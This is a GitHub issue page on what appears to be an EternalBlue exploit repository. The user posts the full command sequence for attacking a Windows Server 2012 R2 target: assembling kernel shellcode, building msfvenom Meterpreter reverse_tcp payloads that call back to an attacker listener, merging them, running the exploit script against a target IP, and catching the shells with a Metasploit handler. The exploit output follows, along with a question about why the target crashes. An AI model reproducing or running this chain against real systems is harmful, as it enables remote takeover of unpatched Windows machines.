Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Windows Server 2012 r2 Standard Crashes #41

Open
xochilpili opened this issue Sep 18, 2019 · 1 comment
Open

Windows Server 2012 r2 Standard Crashes #41

xochilpili opened this issue Sep 18, 2019 · 1 comment

Comments

@xochilpili
Copy link

Hello,

Im doing some test with windows server 2012 r2 (fresh install), then using this steps:

nasm -f bin eternalblue_kshellcode_x64.asm
nasm -f bin eternalblue_kshellcode_x86.asm

msfvenom -p windows/x64/meterpreter/reverse_tcp -f raw -o meterpreter_msf.bin EXITFUNC=thread LHOST=192.168.105.126 LPORT=4444

msfvenom -p windows/meterpreter/reverse_tcp -f raw -o meterpreter_msf_x86.bin EXITFUNC=thread LHOST=192.168.105.126 LPORT=4445

cat eternalblue_kshellcode_x64 meterpreter_msf.bin > meterpreter_payload.bin
cat eternalblue_kshellcode_x86 meterpreter_msf_x86.bin > meterpreter_msf_x86.bin

python eternalblue_sc_merge.py meterpreter_payload.bin meterpreter_msf_x86_payload.bin sc_all.bin

eternalblue_exploit8.py << set valid credentials
use msfconsole with exploit/multi/handler

python eternalblue_exploit8.py 192.168.105.163 sc_all.bin 12

shellcode size: 2568
numGroomConn: 12
Target OS: Windows Server 2012 R2 Standard 9600
got good NT Trans response
got good NT Trans response
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status for nx: INVALID_PARAMETER
good response status: INVALID_PARAMETER
done

Windows Server 2012 R2 always crashes and reboot, no session created.
Am i missing something ?

@tomovic
Copy link

tomovic commented Apr 8, 2020

safe mode?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants